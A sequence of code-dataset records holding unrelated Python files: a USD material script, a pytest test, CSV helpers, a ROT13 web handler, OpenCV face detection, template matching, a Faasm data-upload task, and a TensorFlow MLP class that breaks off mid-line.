diffuseTextureSampler.CreateIdAttr('UsdUVTexture')\n diffuseTextureSampler.CreateInput('file', Sdf.ValueTypeNames.Asset).Set(TEXTURE_FILE)\n diffuseTextureSampler.CreateInput('st', Sdf.ValueTypeNames.Float2).ConnectToSource(stReader, 'result')\n diffuseTextureSampler.CreateOutput('rgb', Sdf.ValueTypeNames.Float3)\n pbrShader.CreateOutput('diffuseColor', Sdf.ValueTypeNames.Color3f).ConnectToSource(diffuseTextureSampler, 'rgb')\n\n material.CreateSurfaceOutput().ConnectToSource(pbrShader, 'surface')\n\n return material\n\ndef main():\n\n parser = get_parser()\n\n args = parser.parse_args()\n\n # Make the stage\n stage = Usd.Stage.Open(os.path.abspath(args.kitchen))\n\n # Create material\n material = make_material(stage, FRIDGE_PATH + '/grid_material')\n\n # Bind materials\n tileFloorPrim = stage.GetPrimAtPath(FRIDGE_PATH)\n treeIter = iter(Usd.PrimRange.AllPrims(tileFloorPrim))\n for prim in treeIter:\n gprim = UsdGeom.Gprim.Get(stage, prim.GetPath())\n UsdShade.MaterialBindingAPI(gprim).Bind(material)\n\n # Export Stage\n stage.Export(EXPORT_NAME)\n\n\nif __name__ == '__main__':\n main()\n\n", "sub_path": "material_tests/kitchen_material_test.py", "file_name": "kitchen_material_test.py", "file_ext": "py", "file_size_in_byte": 2379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.abspath", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 14, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Material.Define", "line_number": 22, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Material", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 22, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 24, "usage_type": "name"}, {"api_name": "pxr.UsdShade.Shader.Define", "line_number": 27, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Shader", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 27, "usage_type": "name"}, {"api_name": "pxr.UsdShade.Shader.Define", "line_number": 30, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Shader", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 30, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 32, "usage_type": "name"}, {"api_name": "pxr.UsdShade.Shader.Define", "line_number": 34, "usage_type": "call"}, {"api_name": "pxr.UsdShade.Shader", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pxr.UsdShade", "line_number": 34, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 36, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 37, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 38, "usage_type": "name"}, {"api_name": "pxr.Sdf.ValueTypeNames", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pxr.Sdf", "line_number": 39, "usage_type": "name"}, {"api_name": "pxr.Usd.Stage.Open", "line_number": 52, "usage_type": "call"}, {"api_name": 
"pxr.Usd.Stage", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pxr.Usd", "line_number": 52, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pxr.Usd.PrimRange.AllPrims", "line_number": 59, "usage_type": "call"}, {"api_name": "pxr.Usd.PrimRange", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pxr.Usd", "line_number": 59, "usage_type": "name"}, {"api_name": "pxr.UsdGeom.Gprim.Get", "line_number": 61, "usage_type": "call"}, {"api_name": "pxr.UsdGeom.Gprim", "line_number": 61, "usage_type": "attribute"}, {"api_name": "pxr.UsdGeom", "line_number": 61, "usage_type": "name"}, {"api_name": "pxr.UsdShade.MaterialBindingAPI", "line_number": 62, "usage_type": "call"}, {"api_name": "pxr.UsdShade", "line_number": 62, "usage_type": "name"}]} {"seq_id": "648607667", "text": "# coding: utf8\nimport pytest\nfrom app.views import answers as an\nfrom app.views import templates as t\nfrom tests.helpers.fake_i18n import I18N\nfrom tests.helpers.fake_base_message import FakeMessage\nfrom app.views.helpers import Types\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__inside_get(state, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n an.SystemException._get(state)\n\n\n@pytest.mark.unit\n@pytest.mark.views\n@pytest.mark.answers\ndef test__get(state, data, monkeypatch):\n monkeypatch.setattr(an, \"I18N\", I18N)\n monkeypatch.setattr(t, \"SystemException\", FakeMessage)\n answer = an.SystemException.get(state)\n\n assert answer[\"chat_id\"] == data[\"id\"]\n assert answer[\"message_type\"] == Types.TEXT_MESSAGE\n assert isinstance(answer[\"text\"], str)\n", "sub_path": "tests/units/answers/test__system_exception.py", "file_name": "test__system_exception.py", "file_ext": "py", "file_size_in_byte": 861, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "app.views.answers", "line_number": 14, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_i18n.I18N", "line_number": 14, "usage_type": "argument"}, {"api_name": "app.views.templates", "line_number": 15, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_base_message.FakeMessage", "line_number": 15, "usage_type": "argument"}, {"api_name": "app.views.answers.SystemException._get", "line_number": 16, "usage_type": "call"}, {"api_name": "app.views.answers.SystemException", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.views.answers", "line_number": 16, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 12, "usage_type": "attribute"}, {"api_name": "app.views.answers", "line_number": 23, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_i18n.I18N", "line_number": 23, "usage_type": "argument"}, {"api_name": "app.views.templates", "line_number": 24, "usage_type": "argument"}, {"api_name": "tests.helpers.fake_base_message.FakeMessage", "line_number": 24, "usage_type": "argument"}, {"api_name": "app.views.answers.SystemException.get", "line_number": 25, "usage_type": "call"}, {"api_name": "app.views.answers.SystemException", "line_number": 25, "usage_type": "attribute"}, {"api_name": "app.views.answers", "line_number": 25, "usage_type": "name"}, 
{"api_name": "app.views.helpers.Types.TEXT_MESSAGE", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.views.helpers.Types", "line_number": 28, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pytest.mark", "line_number": 21, "usage_type": "attribute"}]} {"seq_id": "336038700", "text": "import csv\nimport json\nfrom datetime import datetime\n\ndef ToCSV_separately(Province_list):\n path_peifix = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record Separately\\\\'\n for province in Province_list:\n file_path = path_peifix+province.provinceShortName+'.csv'\n csv_file = open(file_path, 'a+', newline='')\n title = ['sort','确诊','疑似','治愈','死亡','修改时间']\n writer = csv.writer(csv_file)\n writer.writerow(title)\n \n modify_time = datetime.fromtimestamp(province.modifyTime/1000)\n time_str = datetime.strftime(modify_time,'%Y-%m-%d %H:%M:%S')\n writer.writerow([province.sort,province.num_confirmed,province.num_suspected,province.num_cured,province.num_dead,time_str])\n csv_file.close()\n\ndef DicToCSV(dic_data,file_name):\n path = 'D:\\MyGit\\Real-time-dynamic-query-of-pneumonia\\Data Record csv\\\\' + file_name\n csv_file = open(path, 'w+', newline='')\n keys = []\n writer = csv.writer(csv_file)\n for dic in dic_data:\n keys = dic.keys()\n # 写入列名\n writer.writerow(keys)\n break\n\n for dic in dic_data:\n for key in keys:\n if key not in dic:\n dic[key] = ''\n writer.writerow(dic.values())\n csv_file.close()", "sub_path": "functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 1293, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "csv.writer", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "datetime.datetime.strftime", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "csv.writer", "line_number": 23, "usage_type": "call"}]} {"seq_id": "244437895", "text": "# Copyright 2016 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport webapp2\nimport cgi\n\nform=\"\"\"\n\n\n \n Unit 2 ROT13\n \n\n \n
    <form method=\"post\">\n      Enter some text to ROT13:\n      <br>\n      <textarea name=\"text\">%(encoded_output)s</textarea>\n      <br>\n      <input type=\"submit\">\n    </form>
    \n \n\n\n\"\"\"\n\n#handler for /rot13\nclass ROT13(webapp2.RequestHandler):\n def write_form(self, user_input=\"\"):\n encoded_output = user_input.encode('rot13')\n self.response.out.write(form % {'encoded_output': cgi.escape(encoded_output, quote=True) })\n\n def get(self):\n self.write_form()\n\n def post(self):\n user_input = self.request.get(\"text\")\n self.write_form(user_input)\n", "sub_path": "unit2/rot13.py", "file_name": "rot13.py", "file_ext": "py", "file_size_in_byte": 1342, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "webapp2.RequestHandler", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cgi.escape", "line_number": 42, "usage_type": "call"}]} {"seq_id": "261261821", "text": "import cv2\n#openCV module\n\n\nface_cascade = cv2.CascadeClassifier('for_face.xml')\ncap = cv2.VideoCapture('v.mp4')\n# use 0 (inbuilt webcam) -1 (for external webcam) instead of v.mp4 to get results from webcam\n\n\nwhile True:\n _, img = cap.read()\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n \n faces = face_cascade.detectMultiScale(gray, 1.9, 6)\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 1)\n\n\n cv2.imshow('img', img)\n k = cv2.waitKey(2) & 0xff\n if k==27:\n break\n \ncap.release()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 559, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 6, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 20, "usage_type": "call"}]} {"seq_id": "505880080", "text": "#!/usr/bin/env python\n\nimport cv2\nimport numpy as np\n\n\n# Template Matching Class\nclass Template:\n\n\t# Set up the template contour for later use\n\tdef __init__(self):\n\t\tself.__template_image__ = cv2.imread(\"template.png\")\n\t\tself.__template_image__ = cv2.cvtColor(self.__template_image__, cv2.COLOR_BGR2HSV)\n\t\tself.__template_image__ = cv2.inRange(self.__template_image__, np.array([0, 0, 2]), np.array([255, 255, 255]))\n\t\t_, contours, h = cv2.findContours(self.__template_image__, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t\tareas = [cv2.contourArea(c) for c in contours]\n\t\tmx_indx = np.argmax(areas)\n\t\tself.__template_contour__ = contours[mx_indx]\n\n\t# Compare the list of contours to the template and sort by the closest matching contours.\n\t# Returns a 2d array, first column contains a number representing the match, smaller the number,\n\t# the closer the contour is to the template, second column represents the array index in the\n\t# originally passed list\n\tdef list_of_matched(self, contours):\n\t\tlist_of_matches = []\n\t\tindex = 0\n\t\tfor c in contours:\n\t\t\tlist_of_matches.append([cv2.matchShapes(self.__template_contour__, c, 1, 0.0), index])\n\t\t\tindex += 1\n\t\tlist_of_matches = sorted(list_of_matches, key=lambda x: x[0])\n\t\treturn list_of_matches\n\n\t# Get the index of the best matched contour in passed list of contours\n\tdef best_match(self, contours):\n\t\treturn 
self.list_of_matched(contours)[0][1]\n\n\t# For debugging, Just to see what the template looks like\n\tdef get_image_to_show(self):\n\t\treturn self.__template_image__\n\n", "sub_path": "Template.py", "file_name": "Template.py", "file_ext": "py", "file_size_in_byte": 1517, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cv2.imread", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.matchShapes", "line_number": 28, "usage_type": "call"}]} {"seq_id": "536222250", "text": "from invoke import task\nfrom os.path import exists, join\nimport requests\n\nfrom tasks.lammps.env import (\n LAMMPS_DIR,\n LAMMPS_FAASM_DATA_PREFIX,\n get_faasm_benchmark,\n)\nfrom tasks.util.faasm import get_faasm_upload_host_port\n\n\n@task(default=True, iterable=[\"bench\"])\ndef upload(ctx, bench):\n \"\"\"\n Upload LAMMPS benchmark data to Faasm\n \"\"\"\n for b in bench:\n _bench = get_faasm_benchmark(b)\n\n host, port = get_faasm_upload_host_port()\n url = \"http://{}:{}/file\".format(host, port)\n\n # Upload all data corresponding to the benchmark\n for data in _bench[\"data\"]:\n file_name = data.split(\"/\")[-1]\n host_path = join(LAMMPS_DIR, data + \".faasm\")\n faasm_path = join(LAMMPS_FAASM_DATA_PREFIX, file_name)\n\n if not exists(host_path):\n print(\"Did not find data at {}\".format(host_path))\n raise RuntimeError(\"Did not find LAMMPS data!\")\n\n print(\n \"Uploading LAMMPS data ({}) to {} ({})\".format(\n host_path, url, faasm_path\n )\n )\n response = requests.put(\n url,\n data=open(host_path, \"rb\"),\n headers={\"FilePath\": faasm_path},\n )\n\n print(\n \"Response {}: {}\".format(response.status_code, response.text)\n )\n\n if response.status_code != 200:\n raise RuntimeError(\"Error uploading LAMMPS data!\")\n", "sub_path": "tasks/lammps/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 1508, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "tasks.lammps.env.get_faasm_benchmark", "line_number": 19, "usage_type": "call"}, {"api_name": "tasks.util.faasm.get_faasm_upload_host_port", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "tasks.lammps.env.LAMMPS_DIR", "line_number": 27, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "tasks.lammps.env.LAMMPS_FAASM_DATA_PREFIX", "line_number": 28, "usage_type": "argument"}, {"api_name": "os.path.exists", "line_number": 30, "usage_type": "call"}, {"api_name": "requests.put", "line_number": 39, "usage_type": "call"}, {"api_name": "invoke.task", "line_number": 13, "usage_type": "call"}]} {"seq_id": "73654908", "text": "# /bin/env python3\n\nimport os\nimport numpy as np\nimport 
tensorflow as tf\nfrom sklearn.preprocessing import Imputer, MinMaxScaler\n\nclass MLP():\n def __init__(\n self,\n mse_target=1e-4,\n max_epochs=1000,\n hidden_layer_sizes=None,\n output_fn=tf.identity,\n verbose=False,\n learning_rate=0.001,\n ):\n print(\"init\")\n self.net = None\n self._initialized = False\n\n self.mse_target = mse_target\n self.max_epochs = max_epochs\n self._verbose = verbose\n if hidden_layer_sizes is not None:\n if type(hidden_layer_sizes) is not tuple:\n raise Exception(\"invalid hidden layer architecure\")\n if len(hidden_layer_sizes) <= 0:\n raise Exception(\"invalid hidden layer architecure, length is zero\")\n self.hidden_layer_sizes = hidden_layer_sizes\n self.output_fn = output_fn\n self.learning_rate = learning_rate\n\n def _initializers(self, x_shape, y_shape):\n print(\"initializers\")\n if hasattr(self, \"_initialized\") and self._initialized:\n return\n\n self._x_shape = x_shape\n self._y_shape = y_shape\n\n # Initializers\n sigma = 1\n weight_initializer = tf.variance_scaling_initializer(\n mode=\"fan_avg\",\n distribution=\"uniform\",\n scale=sigma\n )\n bias_initializer = tf.zeros_initializer()\n\n # Data placeholders\n self._X = tf.placeholder(dtype=tf.float32, shape=[None, x_shape[1]])\n self._Y = tf.placeholder(dtype=tf.float32, shape=[None, y_shape[1]])\n\n n_target = y_shape[1]\n\n neurons = [x_shape[1]]\n hiddens = [self._X]\n\n for layer in self.hidden_layer_sizes:\n n_neurons = 0\n activation = None\n if type(layer) is int:\n n_neurons = layer\n activation = tf.nn.relu\n elif type(layer) is tuple:\n if len(layer) != 2:\n raise Exception(\"invalid layer tuple size\")\n n_neurons = layer[0]\n activation = layer[1]\n else:\n raise Exception(\"invalid type of layer\")\n # Layer: Variables for hidden weights and biases\n W_hidden = tf.Variable(\n weight_initializer([neurons[-1], n_neurons])\n )\n neurons.append(n_neurons)\n bias_hidden = tf.Variable(bias_initializer([n_neurons]))\n # Hidden layer\n hiddens.append(\n activation(\n tf.add(tf.matmul(hiddens[-1], W_hidden), bias_hidden)\n )\n )\n\n # Output layer: Variables for output weights and biases\n W_out = tf.Variable(weight_initializer([neurons[-1], n_target]))\n bias_out = tf.Variable(bias_initializer([n_target]))\n\n # Output layer\n self._out = self.output_fn(\n tf.add(tf.matmul(hiddens[-1], W_out), bias_out))\n\n # Cost function\n self._mse = tf.reduce_mean(tf.squared_difference(self._out, self._Y))\n\n # Optimizer\n self._opt = tf.train.AdamOptimizer(\n learning_rate=self.learning_rate,\n ).minimize(self._mse)\n\n # Saver\n self._saver = tf.train.Saver()\n\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n\n # Init\n self.net.run(tf.global_variables_initializer())\n\n self._initialized = True\n\n def fit(self, X, y):\n if type(X) is not np.ndarray:\n raise TypeError()\n if type(y) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n if len(y.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n self._initializers(X.shape, y.shape)\n\n # Build train and test data set\n train_start = 0\n train_end = int(np.floor(0.8 * X.shape[0]))\n test_start = train_end + 1\n test_end = X.shape[0]\n X_data_train = X[np.arange(train_start, train_end), :]\n X_test = X[np.arange(test_start, test_end), :]\n y_data_train = y[np.arange(train_start, train_end), :]\n y_test = y[np.arange(test_start, test_end), :]\n\n # Fit neural net\n batch_size = 256\n mse_train = []\n mse_test = []\n\n mse_actual = 
np.finfo(np.float32).max\n        epochs = 0\n\n        while mse_actual > self.mse_target and epochs < self.max_epochs:\n            # Shuffle training data\n            shuffle_indices = np.random.permutation(\n                np.arange(X_data_train.shape[0]))\n            X_train = X_data_train[shuffle_indices]\n            y_train = y_data_train[shuffle_indices]\n\n            if X.shape[0] <= batch_size:\n                self.net.run(\n                    self._opt,\n                    feed_dict={self._X: X_train, self._Y: y_train})\n                mse_train.append(\n                    self.net.run(\n                        self._mse,\n                        feed_dict={self._X: X_train, self._Y: y_train}))\n                mse_test.append(\n                    self.net.run(\n                        self._mse,\n                        feed_dict={self._X: X_test, self._Y: y_test}))\n                mse_actual = mse_train[-1]\n\n                if np.mod(epochs, 50) == 0 and self._verbose:\n                    print(\"Epoch:\", epochs)\n                    print('MSE Train:', mse_train[-1])\n                    print('MSE Test:', mse_test[-1])\n            else:\n                # Minibatch training\n                for i in range(0, X.shape[0] // batch_size):\n                    start = i * batch_size\n                    batch_x = X_train[start:start + batch_size]\n                    batch_y = y_train[start:start + batch_size]\n                    # Run optimizer with batch\n                    self.net.run(\n                        self._opt,\n                        feed_dict={self._X: batch_x, self._Y: batch_y})\n                mse_train.append(\n                    self.net.run(\n                        self._mse,\n                        feed_dict={self._X: X_train, self._Y: y_train}))\n                mse_test.append(\n                    self.net.run(\n                        self._mse,\n                        feed_dict={self._X: X_test, self._Y: y_test}))\n                mse_actual = mse_train[-1]\n\n                if np.mod(epochs, 50) == 0 and self._verbose:\n                    print(\"Epoch:\", epochs)\n                    print('MSE Train:', mse_train[-1])\n                    print('MSE Test:', mse_test[-1])\n\n            epochs += 1\n        self.mse_train = mse_train\n        self.mse_test = mse_test\n        return self\n\n    def score(self, X, y_true):\n        \"\"\" R^2 coefficient\n        The best possible score is 1.0 and it can be negative\n        (because the model can be arbitrarily worse). A constant\n        model that always predicts the expected value of y,\n        disregarding the input features, would get a R^2 score of 0.0.\n        (from sklearn documentation)\n        \"\"\"\n        if not self._initialized:\n            raise Exception(\"Not initialized. Run fit first.\")\n        if type(X) is not np.ndarray:\n            raise TypeError()\n        if type(y_true) is not np.ndarray:\n            raise TypeError()\n        if len(X.shape) < 2:\n            raise Exception(\"invalid matrix shape\")\n        if len(y_true.shape) < 2:\n            raise Exception(\"invalid matrix shape\")\n        y_pred = self.net.run(self._out, feed_dict={self._X: X})\n        u = ((y_true - y_pred) ** 2).sum()\n        v = ((y_true - y_true.mean()) ** 2).sum()\n        return (1 - u/v)\n\n    def predict(self, X):\n        if not self._initialized:\n            raise Exception(\"Not initialized. 
Run fit first.\")\n if type(X) is not np.ndarray:\n raise TypeError()\n if len(X.shape) < 2:\n raise Exception(\"invalid matrix shape\")\n # Prediction\n pred = self.net.run(self._out, feed_dict={self._X: X})\n return pred\n\n def save(self, filename):\n fname = os.path.basename(filename)\n directory = os.path.dirname(filename)\n _, file_extension = os.path.splitext(filename)\n if directory != \"\":\n directory += \"/\"\n model_path = directory + fname + \".tfmodel\" \n self._model_path = model_path\n import pickle\n with open(filename, mode='wb') as outfile:\n pickle.dump(self, outfile, protocol=4)\n\n def load(self, filename):\n import pickle\n with open(filename, mode='rb') as f:\n rna = pickle.load(f)\n self.__dict__.update(rna.__dict__)\n self._initializers(self._x_shape, self._y_shape)\n \n def _save_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._model_path\n #path = os.path.abspath(model_file)\n if not os.path.isdir(model_file):\n os.mkdir(model_file)\n model_file = model_file + \"/\"\n self._save_path = self._saver.save(self.net, model_file)\n \n def _load_tf(self, model_file=\"\"):\n if model_file == \"\":\n model_file = self._save_path\n self._saver.restore(self.net, model_file)\n\n def _serialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is tuple:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if not hasattr(h[1], '__call__'):\n raise Exception(\"invalid hidden layer activation function\")\n out.append([h[0], _ser_fn_activation(h[1])])\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type\")\n return tuple(out)\n\n def _unserialize_hidden_layers(self, hidden):\n out = []\n for h in hidden:\n if type(h) is list:\n if len(h) != 2:\n raise Exception(\"invalid hidden layer tuple\")\n if type(h[0]) is not int:\n raise Exception(\"invalid hidden layer neurons number\")\n if type(h[1]) is not str:\n raise Exception(\"invalid hidden layer activation function\")\n out.append(tuple([h[0], _unser_fn_activation(h[1])]))\n elif type(h) is int:\n out.append(h)\n else:\n raise Exception(\"invalid type:\", type(h))\n return tuple(out)\n\n def __getstate__(self):\n print(\"getstate\")\n if not self._initialized:\n raise Exception(\"Not initialized. Run fit first.\")\n state = {\n \"mse_target\": self.mse_target,\n \"max_epochs\": self.max_epochs,\n \"_verbose\": self._verbose,\n \"_x_shape\": self._x_shape,\n \"_y_shape\": self._y_shape,\n \"mse_train\": self.mse_train,\n \"mse_test\": self.mse_test,\n \"hidden_layer_sizes\":\n self._serialize_hidden_layers(self.hidden_layer_sizes),\n \"output_fn\": _ser_fn_activation(self.output_fn),\n \"learning_rate\": self.learning_rate,\n }\n if hasattr(self, \"_model_path\"):\n self._save_tf()\n state[\"_model_path\"] = self._model_path\n state[\"_save_path\"] = self._save_path\n else:\n print(\"### No path to save the model\")\n return state\n\n def __setstate__(self, state):\n print(\"setstate\")\n # Restore instance attributes (i.e., filename and lineno).\n hl = self._unserialize_hidden_layers(state[\"hidden_layer_sizes\"])\n state[\"hidden_layer_sizes\"] = hl\n state[\"output_fn\"] = _unser_fn_activation(state[\"output_fn\"])\n self.__dict__.update(state)\n # Restore the previously opened file's state. 
To do so, we need to\n # reopen it and read from it until the line count is restored.\n if hasattr(self, \"_save_path\"):\n # Session\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n # Saver\n self._saver = tf.train.Saver()\n # Load model\n self._load_tf()\n else:\n self._initializers(self._x_shape, self._y_shape)\n print(\"### no model to load\")\n\n def __enter__(self):\n print(\"enter\")\n self._initialized = False\n if not hasattr(self, \"net\") or self.net is None:\n self.net = tf.InteractiveSession()\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n print(\"exit\")\n if hasattr(self, \"net\"):\n self.net.close()\n\n def close(self):\n \"\"\"\" \n Closes the RNA.\n Closes the underlay session with TensorFlow.\n \"\"\"\n if hasattr(self, \"net\") and self.net is not None:\n self.net.close()\n\n\ndef _ser_fn_activation(fn):\n \"\"\"\n Return the name of one function.\n \"\"\"\n # if fn is tf.nn.relu:\n # return \"relu\"\n # elif tf.nn.sigmoid.__name__:\n # return \"sigmoid\"\n # raise Exception(\"function unknown, can't serialize\")\n return fn.__name__\n\n\ndef _unser_fn_activation(name):\n \"\"\"\n Return the function with name.\n \"\"\"\n if name == \"relu\":\n return tf.nn.relu\n elif name == \"sigmoid\":\n return tf.nn.sigmoid\n elif name == \"identity\":\n return tf.identity\n elif name == \"round\":\n return tf.round\n raise Exception(\"unknown function\")\n\ndef _make_matrix_classes(y):\n y_max = max(y)[0]\n out = np.zeros((y.shape[0], y_max + 1), dtype=int)\n for i in range(out.shape[0]):\n out[i, y[i]] = 1\n return out\n\nif __name__ == '__main__':\n from sklearn.datasets import load_iris\n from sklearn.datasets import load_linnerud\n from sklearn.model_selection import StratifiedKFold\n from sklearn.model_selection import ShuffleSplit\n\n # with MLP(\n # mse_target=1e-4,\n # max_epochs=100000,\n # hidden_layer_sizes=(16, 100, (12, tf.nn.sigmoid)),\n # output_fn=tf.nn.sigmoid,\n # verbose=False,\n # ) as rna:\n # iris = load_iris()\n\n # skf = StratifiedKFold(n_splits=4)\n # train_index, test_index = next(iter(skf.split(iris.data, iris.target)))\n\n # X_train = iris.data[train_index]\n # y_train = iris.target[train_index]\n # X_test = iris.data[test_index]\n # y_test = iris.target[test_index]\n\n # X_train = np.array(X_train)\n # y_train = np.array(y_train)\n # X_test = np.array(X_test)\n # y_test = np.array(y_test)\n\n # y_train = np.reshape(y_train, (y_train.shape[0], 1))\n # y_test = np.reshape(y_test, (y_test.shape[0], 1))\n\n # y_train = _make_matrix_classes(y_train)\n # y_test = _make_matrix_classes(y_test)\n\n # rna.fit(X_train, y_train)\n # y_pred = rna.predict(X_test)\n # s = rna.score(X_test, y_test)\n # print(\"score: {}\".format(s))\n \n with MLP(\n mse_target=1e-8,\n max_epochs=1e8,\n hidden_layer_sizes=(6, 30, 30, 6),\n output_fn=tf.nn.sigmoid,\n verbose=True,\n learning_rate=1e-6,\n ) as rna:\n linnerud = load_linnerud()\n\n ss = ShuffleSplit()\n train_index, test_index = next(iter(ss.split(linnerud.data)))\n\n X_train = linnerud.data[train_index]\n y_train = linnerud.target[train_index]\n X_test = linnerud.data[test_index]\n y_test = linnerud.target[test_index]\n\n X_train = np.array(X_train)\n y_train = np.array(y_train)\n X_test = np.array(X_test)\n y_test = np.array(y_test)\n\n norm_x = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n norm_y = MinMaxScaler(feature_range=(0.0, 1.0), copy=True)\n\n X_train = norm_x.fit_transform(X_train)\n X_test = norm_x.transform(X_test)\n y_train = 
